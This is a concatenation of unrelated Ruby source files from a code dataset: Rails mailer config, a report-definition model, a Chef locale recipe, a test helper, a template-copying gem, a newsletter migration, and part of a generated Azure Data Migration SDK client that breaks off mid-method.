  # Mailer settings (See: http://guides.rubyonrails.org/action_mailer_basics.html)
  config.action_mailer.default_url_options = { host: 'yurusu-video.herokuapp.com' }
  config.action_mailer.raise_delivery_errors = true
  config.action_mailer.perform_deliveries = SEND_EMAILS # Whether or not to actually send emails when calling #deliver on an ActionMailer action. Set to `false` to aid in functional testing.
  # config.action_mailer.logger = nil
  config.action_mailer.delivery_method = :smtp
  # Gmail SMTP with STARTTLS; credentials come from the constants above.
  config.action_mailer.smtp_settings = {
    :address              => 'smtp.gmail.com',
    :port                 => 587,
    :domain               => EMAIL_ADDR.split('@').last,
    :user_name            => EMAIL_ADDR,
    :password             => EMAIL_PWD,
    :authentication       => 'plain',
    :enable_starttls_auto => true
  }

  # Enable locale fallbacks for I18n (makes lookups for any locale fall back to
  # the I18n.default_locale when a translation can not be found).
  config.i18n.fallbacks = true

  # Send deprecation notices to registered listeners.
  config.active_support.deprecation = :notify

  # Disable automatic flushing of the log to improve performance.
  # config.autoflush_log = false

  # Use default logging formatter so that PID and timestamp are not suppressed.
  config.log_formatter = ::Logger::Formatter.new
end | 38.579439 | 190 | 0.738372 |
e2e811db1bc4d9b53f7a75dafaaa1e462adaff90 | 4,137 | # frozen_string_literal: true
# A scheduled (monthly/quarterly/yearly) report definition.  Each report has
# a report_class (the generator), optionally a target (what the report is
# about) and a source (where session data comes from), both validated
# against per-report-class rules below.
class AutomatedReport < ApplicationRecord
  has_many :automated_report_instances, dependent: :destroy
  has_many :automated_report_subscriptions, dependent: :destroy

  valhammer

  validates :interval, inclusion: { in: %w[monthly quarterly yearly] }
  validate :target_must_be_valid_for_report_type,
           :report_class_must_be_known,
           :source_must_be_valid_for_report_type

  # Interval wrapped in a StringInquirer so callers can ask
  # `interval.monthly?` etc.; nil when unset.
  def interval
    value = super
    value && ActiveSupport::StringInquirer.new(value)
  end

  # Human-readable name of the report's target: fixed labels for
  # utilization reports, 'Federation' for untargeted reports, a titleized
  # object-type string, or the target object's own name.
  def target_name
    type = report_class
    return 'Identity Providers' if type == 'IdentityProviderUtilizationReport'
    return 'Service Providers' if type == 'ServiceProviderUtilizationReport'
    return 'Federation' if klass.nil?
    return target.titleize if klass.eql? :object_type

    target_object.name
  end

  # Resolve the target value to its model instance via the per-class
  # identifying attribute.
  def target_object
    klass.find_by_identifying_attribute(target)
  end

  def self.report_class_needs_source?(report_class)
    REPORTS_THAT_NEED_SOURCE.include?(report_class)
  end

  def self.report_class_needs_target?(report_class)
    !TARGET_CLASSES[report_class].nil?
  end

  def needs_source?
    AutomatedReport.report_class_needs_source?(report_class)
  end

  # Session source to use, resolving defaults:
  # explicit source > app-configured default > 'DS'.
  def source_if_needed
    return nil unless needs_source?
    return source if source.present?
    return Rails.application.config.reporting_service.default_session_source if
      Rails.application.config.reporting_service.default_session_source.present?

    # Complete fall back: default to DS if source is not set in params
    # and not in app_config.
    'DS'
  end

  private

  # Maps each report class to what its target must be:
  # nil = no target, :object_type = an object-type identifier string,
  # a model class = an instance of that model.
  TARGET_CLASSES = {
    'DailyDemandReport' => nil,
    'FederatedSessionsReport' => nil,
    'FederationGrowthReport' => nil,
    'IdentityProviderAttributesReport' => nil,
    'IdentityProviderUtilizationReport' => nil,
    'ServiceProviderUtilizationReport' => nil,
    'SubscriberRegistrationsReport' => :object_type,
    'IdentityProviderDailyDemandReport' => IdentityProvider,
    'IdentityProviderDestinationServicesReport' => IdentityProvider,
    'IdentityProviderSessionsReport' => IdentityProvider,
    'ProvidedAttributeReport' => SAMLAttribute,
    'RequestedAttributeReport' => SAMLAttribute,
    'ServiceCompatibilityReport' => ServiceProvider,
    'ServiceProviderDailyDemandReport' => ServiceProvider,
    'ServiceProviderSessionsReport' => ServiceProvider,
    'ServiceProviderSourceIdentityProvidersReport' => ServiceProvider
  }.freeze

  SOURCE_VALUES = %w[DS IdP].freeze

  private_constant :TARGET_CLASSES, :SOURCE_VALUES

  def klass
    TARGET_CLASSES[report_class]
  end

  def report_class_must_be_known
    return if TARGET_CLASSES.key?(report_class)

    errors.add(:report_class, 'must be of known type')
  end

  def target_must_be_valid_for_report_type
    return if report_class.nil?
    return target_must_be_nil if klass.nil?
    return target_must_be_object_type_identifier if klass == :object_type
    return if klass.find_by_identifying_attribute(target)

    errors.add(:target, 'must be appropriate for the report type')
  end

  # Report classes whose generators require a session source.
  REPORTS_THAT_NEED_SOURCE = %w[
    DailyDemandReport FederatedSessionsReport IdentityProviderDailyDemandReport
    IdentityProviderDestinationServicesReport IdentityProviderSessionsReport
    ServiceProviderDailyDemandReport ServiceProviderSessionsReport
    ServiceProviderSourceIdentityProvidersReport
    IdentityProviderUtilizationReport ServiceProviderUtilizationReport
  ].freeze

  def source_must_be_valid_for_report_type
    return if report_class.nil?
    return if needs_source? && SOURCE_VALUES.include?(source)
    return if !needs_source? && source.nil?

    errors.add(:source, "is not valid for report #{report_class}")
  end

  def target_must_be_nil
    return if target.nil?

    errors.add(:target, 'must be omitted for the report type')
  end

  OBJECT_TYPE_IDENTIFIERS =
    %w[identity_providers service_providers organizations
       rapid_connect_services services].freeze

  def target_must_be_object_type_identifier
    return if OBJECT_TYPE_IDENTIFIERS.include?(target)

    errors.add(:target, 'must be an object type identifier')
  end
end
| 30.873134 | 80 | 0.773266 |
91dc1fd1d36bfd0424071d16cfb7b36f6548a288 | 296 | # set locale to en_US.UTF-8 (which matches the live server) everywhere ubuntu
# packages might look for it, including the current process.
ENV['LANG'] = "en_US.UTF-8"
ENV['LC_ALL'] = "en_US.UTF-8"

# Persist the locale system-wide via /etc/default/locale.
template "/etc/default/locale" do
  source "locale"
  owner "root"
  group "root"
  mode 0644
end | 24.666667 | 77 | 0.712838 |
bb351e6755870a2693621034065bcfa3fc59a91c | 939 | ENV["RAILS_ENV"] = "test"
require File.expand_path(File.dirname(__FILE__) + "/../config/environment")
require 'test_help'
require "authlogic/test_case"
require "webrat"
# Run Webrat in Rails mode; don't open saved error pages on failure.
Webrat.configure do |config|
  config.mode = :rails
  config.open_error_files = false
end
# Make Webrat matchers (have_selector etc.) available in controller tests.
class ActionController::TestCase
  include Webrat::Matchers

  # Webrat matchers operate on the raw response body.
  def response_body
    @response.body
  end
end
class ActiveSupport::TestCase
  include RR::Adapters::TestUnit unless include?(RR::Adapters::TestUnit)

  self.use_transactional_fixtures = true
  self.use_instantiated_fixtures  = false

  # Login helper for integration tests.
  # If your test does not define a @user this will create one for you,
  # then drives the real login form through Webrat.
  def login
    @user = Factory(:user) unless defined?(@user)
    visit login_path
    fill_in 'Email', :with => @user.email
    fill_in 'Password', :with => 'secret'
    click_button 'LOGIN'
  end

  # Seed a user and an active project for pages that show featured content.
  def featured
    Factory(:user)
    Factory(:active_project)
  end
end
| 22.902439 | 75 | 0.726305 |
03e25019883a0ec6a3e1b2009c965a20f4ddc84a | 3,142 | require 'fileutils'
require "yaarg/version"
# Yet Another AdminLTE Ruby Gem — helpers for installing AdminLTE-flavoured
# Rails generator templates into a host application.
module Yaarg
  # CLI usage instructions.
  #
  # Fix: the previous implementation concatenated every banner line with
  # `+` and no separator, collapsing the whole help text onto one
  # unreadable line.  The lines are now joined with newlines.
  #
  # TODO implement usage instruction for all modules
  #
  # @return [String] multi-line usage text
  def self.help
    [
      "============================================================================================================",
      "============================================================================================================",
      "|| Copyright (C) 2016 - 2017 - GPLv3 - Jefferson Campos - foguinho [dot] peruca [at] gmail [dot] com     ||",
      "|| Yet Another AdminLTE Ruby Gem!                                                                        ||",
      "|| The gem has many modules:                                                                             ||",
      "||   * tpl: help to manage templates to rails app.                                                       ||",
      "||   * adminlte: manage adminlte.                                                                        ||",
      "============================================================================================================",
      "============================================================================================================",
      "",
      "tpl",
      "===",
      "",
      "USAGE: printer_outsourcing [verifySONumber|parsePhysicalSite|parseDepartment|parsePrinterType|generateSeedSO]",
      "* verifySONumber    : Report if a SO number is in so_audit.csv",
      "* parsePhysicalSite : Merge data from physicalSite.csv with so_audit.csv",
      "* parseDepartment   : Merge data from so_with_physicalSite_parsed.csv with department.csv",
      "* parsePrinterType  : Merge data from so_with_physicalSite-department_parsed.csv with printerType.csv",
      "* generateSeedSO    : Generate seed data to ../data/redmine_issues.csv",
      "",
      "WORKFLOW:",
      "# Generate missing SO numbers:",
      "../data/parse_so/audited_so.csv --> ../data/parse_soso_missing.csv",
      "Unified Printer Registration module",
      "==================================="
    ].join("\n")
  end

  # @return [String] the gem version constant (from yaarg/version)
  def self.ver
    VERSION
  end

  # Copy every generator template (model, views, controller) into the
  # target Rails project under lib/templates/.
  # @param project_path [String] project root path, ending with "/"
  def self.tpl(project_path)
    tpl_model(project_path)
    tpl_view(project_path)
    tpl_controller(project_path)
  end

  # Install the ActiveRecord model template.
  def self.tpl_model(project_path)
    path = project_path + "lib/templates/active_record/model/"
    FileUtils.mkdir_p(path) unless Dir.exist? path
    FileUtils.cp(File.dirname(__FILE__) + "/templates/active_record/model/model.rb", path)
  end

  # Install the ERB scaffold view templates (index page and form partial).
  def self.tpl_view(project_path)
    path = project_path + "lib/templates/erb/scaffold"
    FileUtils.mkdir_p(path) unless Dir.exist? path
    FileUtils.cp(File.dirname(__FILE__) + "/templates/erb/scaffold/index.html.erb", path)
    FileUtils.cp(File.dirname(__FILE__) + "/templates/erb/scaffold/_form.html.erb", path)
  end

  # Install the scaffold controller template.
  def self.tpl_controller(project_path)
    path = project_path + "lib/templates/rails/scaffold_controller/"
    FileUtils.mkdir_p(path) unless Dir.exist? path
    FileUtils.cp(File.dirname(__FILE__) + "/templates/rails/scaffold_controller/controller.rb", path)
  end
end
| 45.536232 | 119 | 0.507638 |
26508203bbf3f4a55bb67032e46112c313df1982 | 214 | class AddSpreeNewslettersTable < SolidusSupport::Migration[4.2]
def change
create_table :spree_newsletters do |t|
t.string :name
t.string :email
t.timestamps null: false
end
end
end
| 19.454545 | 63 | 0.686916 |
61d31b02a2c144e07b612edd86acefb22618f76a | 85,624 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::DataMigration::Mgmt::V2018_03_15_preview
#
# Data Migration Client
#
class Services
include MsRestAzure
#
# Creates and initializes a new instance of the Services class.
# @param client service class for accessing basic functionality.
#
def initialize(client)
@client = client
end
# @return [DataMigrationServiceClient] reference to the DataMigrationServiceClient
attr_reader :client
#
# Create or update DMS Instance
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The PUT method creates a new service or updates an
# existing one. When a service is updated, existing child resources (i.e.
# tasks) are unaffected. Services currently support a single kind, "vm", which
# refers to a VM-based service, although other kinds may be added in the
# future. This method can change the kind, SKU, and network of the service, but
# if tasks are currently running (i.e. the service is busy), this will fail
# with 400 Bad Request ("ServiceIsBusy"). The provider will reply when
# successful with 200 OK or 201 Created. Long-running operations use the
# provisioningState property.
#
# @param parameters [DataMigrationService] Information about the service
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [DataMigrationService] operation results.
#
def create_or_update(parameters, group_name, service_name, custom_headers:nil)
response = create_or_update_async(parameters, group_name, service_name, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# @param parameters [DataMigrationService] Information about the service
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] promise which provides async access to http
# response.
#
def create_or_update_async(parameters, group_name, service_name, custom_headers:nil)
# Send request
promise = begin_create_or_update_async(parameters, group_name, service_name, custom_headers:custom_headers)
promise = promise.then do |response|
# Defining deserialization method.
deserialize_method = lambda do |parsed_response|
result_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::DataMigrationService.mapper()
parsed_response = @client.deserialize(result_mapper, parsed_response)
end
# Waiting for response.
@client.get_long_running_operation_result(response, deserialize_method)
end
promise
end
#
# Get DMS Service Instance
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The GET method retrieves information about a service
# instance.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [DataMigrationService] operation results.
#
def get(group_name, service_name, custom_headers:nil)
response = get_async(group_name, service_name, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Get DMS Service Instance
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The GET method retrieves information about a service
# instance.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def get_with_http_info(group_name, service_name, custom_headers:nil)
get_async(group_name, service_name, custom_headers:custom_headers).value!
end
#
# Get DMS Service Instance
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The GET method retrieves information about a service
# instance.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def get_async(group_name, service_name, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, 'group_name is nil' if group_name.nil?
fail ArgumentError, 'service_name is nil' if service_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'groupName' => group_name,'serviceName' => service_name},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::DataMigrationService.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Delete DMS Service Instance
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The DELETE method deletes a service. Any running tasks
# will be canceled.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param delete_running_tasks [Boolean] Delete the resource even if it contains
# running tasks
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
def delete(group_name, service_name, delete_running_tasks:nil, custom_headers:nil)
  # Block until the long-running delete finishes; the operation produces no
  # body, so this method always returns nil.
  delete_async(group_name, service_name,
               delete_running_tasks: delete_running_tasks,
               custom_headers: custom_headers).value!
  nil
end
#
# Deletes the service as a long-running operation.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param delete_running_tasks [Boolean] Delete the resource even if it contains
# running tasks
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] promise which provides async access to http
# response.
#
def delete_async(group_name, service_name, delete_running_tasks:nil, custom_headers:nil)
  # Kick off the initial DELETE request.
  initial_promise = begin_delete_async(group_name, service_name,
                                       delete_running_tasks: delete_running_tasks,
                                       custom_headers: custom_headers)

  # Poll the long-running operation to completion. No response body is
  # expected, so the deserializer is intentionally a no-op.
  initial_promise.then do |response|
    noop_deserializer = lambda do |parsed_response|
    end
    @client.get_long_running_operation_result(response, noop_deserializer)
  end
end
#
# Update DMS Service Instance
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The PATCH method updates an existing service. This method
# can change the kind, SKU, and network of the service, but if tasks are
# currently running (i.e. the service is busy), this will fail with 400 Bad
# Request ("ServiceIsBusy").
#
# @param parameters [DataMigrationService] Information about the service
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [DataMigrationService] operation results.
#
def update(parameters, group_name, service_name, custom_headers:nil)
  # Block on the async variant and unwrap the deserialized body, if any.
  result = update_async(parameters, group_name, service_name, custom_headers: custom_headers).value!
  result.nil? ? nil : result.body
end
#
# Updates the service as a long-running operation.
#
# @param parameters [DataMigrationService] Information about the service
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] promise which provides async access to http
# response.
#
def update_async(parameters, group_name, service_name, custom_headers:nil)
  # Kick off the initial PATCH request.
  initial_promise = begin_update_async(parameters, group_name, service_name, custom_headers: custom_headers)

  # Poll the long-running operation to completion, deserializing the final
  # payload into a DataMigrationService model.
  initial_promise.then do |response|
    deserializer = lambda do |parsed_response|
      mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::DataMigrationService.mapper()
      @client.deserialize(mapper, parsed_response)
    end
    @client.get_long_running_operation_result(response, deserializer)
  end
end
#
# Check service health status
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This action performs a health check and returns the status
# of the service and virtual machine size.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [DataMigrationServiceStatusResponse] operation results.
#
def check_status(group_name, service_name, custom_headers:nil)
  # Block on the async variant and unwrap the deserialized body, if any.
  result = check_status_async(group_name, service_name, custom_headers: custom_headers).value!
  result.nil? ? nil : result.body
end
#
# Check service health status
#
# Identical to #check_status, but returns the full operation response so
# callers can inspect the status code and response headers.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def check_status_with_http_info(group_name, service_name, custom_headers:nil)
  check_status_async(group_name, service_name,
                     custom_headers: custom_headers).value!
end
#
# Check service health status
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This action performs a health check and returns the status
# of the service and virtual machine size.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def check_status_async(group_name, service_name, custom_headers:nil)
  # Validate required client state and arguments before issuing the request.
  fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
  fail ArgumentError, 'group_name is nil' if group_name.nil?
  fail ArgumentError, 'service_name is nil' if service_name.nil?
  fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?

  request_headers = {}
  request_headers['Content-Type'] = 'application/json; charset=utf-8'

  # Set Headers: fresh correlation id per request, plus preferred language.
  request_headers['x-ms-client-request-id'] = SecureRandom.uuid
  request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
  path_template = 'subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}/checkStatus'

  request_url = @base_url || @client.base_url

  options = {
      middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
      path_params: {'subscriptionId' => @client.subscription_id,'groupName' => group_name,'serviceName' => service_name},
      query_params: {'api-version' => @client.api_version},
      headers: request_headers.merge(custom_headers || {}),
      base_url: request_url
  }
  promise = @client.make_request_async(:post, path_template, options)

  promise = promise.then do |result|
    http_response = result.response
    status_code = http_response.status
    response_content = http_response.body
    # 200 is the only success status for this action; anything else raises
    # with the parsed error payload attached.
    unless status_code == 200
      error_model = JSON.load(response_content)
      fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
    end

    # Copy tracing headers from the HTTP response onto the result object.
    result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
    result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
    result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
    # Deserialize Response into a DataMigrationServiceStatusResponse model.
    if status_code == 200
      begin
        parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
        result_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::DataMigrationServiceStatusResponse.mapper()
        result.body = @client.deserialize(result_mapper, parsed_response)
      rescue Exception => e
        fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
      end
    end

    result
  end

  promise.execute
end
#
# Start service
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This action starts the service and the service can be used
# for data migration.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
def start(group_name, service_name, custom_headers:nil)
  # Block until the long-running start finishes; no body is returned.
  start_async(group_name, service_name,
              custom_headers: custom_headers).value!
  nil
end
#
# Starts the service as a long-running operation.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] promise which provides async access to http
# response.
#
def start_async(group_name, service_name, custom_headers:nil)
  # Kick off the initial request.
  initial_promise = begin_start_async(group_name, service_name, custom_headers: custom_headers)

  # Poll the long-running operation to completion. No response body is
  # expected, so the deserializer is intentionally a no-op.
  initial_promise.then do |response|
    noop_deserializer = lambda do |parsed_response|
    end
    @client.get_long_running_operation_result(response, noop_deserializer)
  end
end
#
# Stop service
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This action stops the service and the service cannot be
# used for data migration. The service owner won't be billed when the service
# is stopped.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
def stop(group_name, service_name, custom_headers:nil)
  # Block until the long-running stop finishes; no body is returned.
  stop_async(group_name, service_name,
             custom_headers: custom_headers).value!
  nil
end
#
# Stops the service as a long-running operation.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] promise which provides async access to http
# response.
#
def stop_async(group_name, service_name, custom_headers:nil)
  # Kick off the initial request.
  initial_promise = begin_stop_async(group_name, service_name, custom_headers: custom_headers)

  # Poll the long-running operation to completion. No response body is
  # expected, so the deserializer is intentionally a no-op.
  initial_promise.then do |response|
    noop_deserializer = lambda do |parsed_response|
    end
    @client.get_long_running_operation_result(response, noop_deserializer)
  end
end
#
# Get compatible SKUs
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The skus action returns the list of SKUs that a service
# resource can be updated to.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Array<AvailableServiceSku>] operation results.
#
def list_skus(group_name, service_name, custom_headers:nil)
  # Fetch the first page lazily, then walk every subsequent page so the
  # caller receives the complete, flattened item list.
  lazy_result = list_skus_as_lazy(group_name, service_name, custom_headers: custom_headers)
  lazy_result.get_all_items
end
#
# Get compatible SKUs
#
# Identical to #list_skus, but returns the full operation response so callers
# can inspect the status code and response headers.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_skus_with_http_info(group_name, service_name, custom_headers:nil)
  list_skus_async(group_name, service_name,
                  custom_headers: custom_headers).value!
end
#
# Get compatible SKUs
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The skus action returns the list of SKUs that a service
# resource can be updated to.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_skus_async(group_name, service_name, custom_headers:nil)
  # Validate required client state and arguments before issuing the request.
  fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
  fail ArgumentError, 'group_name is nil' if group_name.nil?
  fail ArgumentError, 'service_name is nil' if service_name.nil?
  fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?

  request_headers = {}
  request_headers['Content-Type'] = 'application/json; charset=utf-8'

  # Set Headers: fresh correlation id per request, plus preferred language.
  request_headers['x-ms-client-request-id'] = SecureRandom.uuid
  request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
  path_template = 'subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}/skus'

  request_url = @base_url || @client.base_url

  options = {
      middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
      path_params: {'subscriptionId' => @client.subscription_id,'groupName' => group_name,'serviceName' => service_name},
      query_params: {'api-version' => @client.api_version},
      headers: request_headers.merge(custom_headers || {}),
      base_url: request_url
  }
  promise = @client.make_request_async(:get, path_template, options)

  promise = promise.then do |result|
    http_response = result.response
    status_code = http_response.status
    response_content = http_response.body
    # 200 is the only success status; other codes raise with the parsed
    # error payload attached.
    unless status_code == 200
      error_model = JSON.load(response_content)
      fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
    end

    # Copy tracing headers from the HTTP response onto the result object.
    result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
    result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
    result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
    # Deserialize Response into a single page of SKUs (ServiceSkuList).
    if status_code == 200
      begin
        parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
        result_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::ServiceSkuList.mapper()
        result.body = @client.deserialize(result_mapper, parsed_response)
      rescue Exception => e
        fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
      end
    end

    result
  end

  promise.execute
end
#
# Check nested resource name validity and availability
#
# This method checks whether a proposed nested resource name is valid and
# available.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param parameters [NameAvailabilityRequest] Requested name to validate
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [NameAvailabilityResponse] operation results.
#
def check_children_name_availability(group_name, service_name, parameters, custom_headers:nil)
  # Block on the async variant and unwrap the deserialized body, if any.
  result = check_children_name_availability_async(group_name, service_name, parameters, custom_headers: custom_headers).value!
  result.nil? ? nil : result.body
end
#
# Check nested resource name validity and availability
#
# Identical to #check_children_name_availability, but returns the full
# operation response so callers can inspect status code and headers.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param parameters [NameAvailabilityRequest] Requested name to validate
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def check_children_name_availability_with_http_info(group_name, service_name, parameters, custom_headers:nil)
  check_children_name_availability_async(group_name, service_name, parameters,
                                         custom_headers: custom_headers).value!
end
#
# Check nested resource name validity and availability
#
# This method checks whether a proposed nested resource name is valid and
# available.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param parameters [NameAvailabilityRequest] Requested name to validate
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def check_children_name_availability_async(group_name, service_name, parameters, custom_headers:nil)
  # Validate required client state and arguments before issuing the request.
  fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
  fail ArgumentError, 'group_name is nil' if group_name.nil?
  fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
  fail ArgumentError, 'service_name is nil' if service_name.nil?
  fail ArgumentError, 'parameters is nil' if parameters.nil?

  request_headers = {}
  request_headers['Content-Type'] = 'application/json; charset=utf-8'

  # Set Headers: fresh correlation id per request, plus preferred language.
  request_headers['x-ms-client-request-id'] = SecureRandom.uuid
  request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?

  # Serialize Request: map the NameAvailabilityRequest model to JSON for the
  # POST body (nil parameters would have been rejected above).
  request_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::NameAvailabilityRequest.mapper()
  request_content = @client.serialize(request_mapper, parameters)
  request_content = request_content != nil ? JSON.generate(request_content, quirks_mode: true) : nil

  path_template = 'subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}/checkNameAvailability'

  request_url = @base_url || @client.base_url

  options = {
      middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
      path_params: {'subscriptionId' => @client.subscription_id,'groupName' => group_name,'serviceName' => service_name},
